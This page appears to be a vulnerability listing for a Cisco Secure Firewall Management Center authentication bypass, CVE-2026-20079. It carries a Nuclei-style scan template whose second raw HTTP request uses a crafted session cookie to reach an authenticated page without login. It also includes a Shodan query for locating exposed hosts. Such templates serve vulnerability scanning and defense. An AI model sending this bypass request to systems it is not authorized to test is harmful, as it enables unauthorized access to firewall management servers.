CVE-2026-20079: Cisco Secure Firewall Management Center - Authentication Bypass

Description

Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.

PoC

id: CVE-2026-20079

info:
  name: Cisco Secure Firewall Management Center - Authentication Bypass
  author: theamanrawat
  severity: critical
  description: |
    Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.
  impact: |
    Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise.
  remediation: |
    Update to the latest available version.
  reference:
    - https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079
    - https://nvd.nist.gov/vuln/detail/CVE-2026-20079
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2026-20079
    epss-score: 0.75752
    epss-percentile: 0.99496
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"BackdraftSyncIntegration"
  tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /help/about.cgi HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(body, "Invalid session ID")'
        condition: and
        internal: true

  - raw:
      - |
        GET /help/about.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: CGISESSID=csm_processes

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Cisco Secure Firewall Management Center", "Model", "OS", "Hostname")'
        condition: and
# digest: 4a0a0047304502206a48570b71a1f3f8419a4e69af42e055ef8600bda651f7d03c66965dec7bd11b022100ff463aae8a0608cce49c61c0f38232d6420f90a085264332088a0c61d2e91353:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities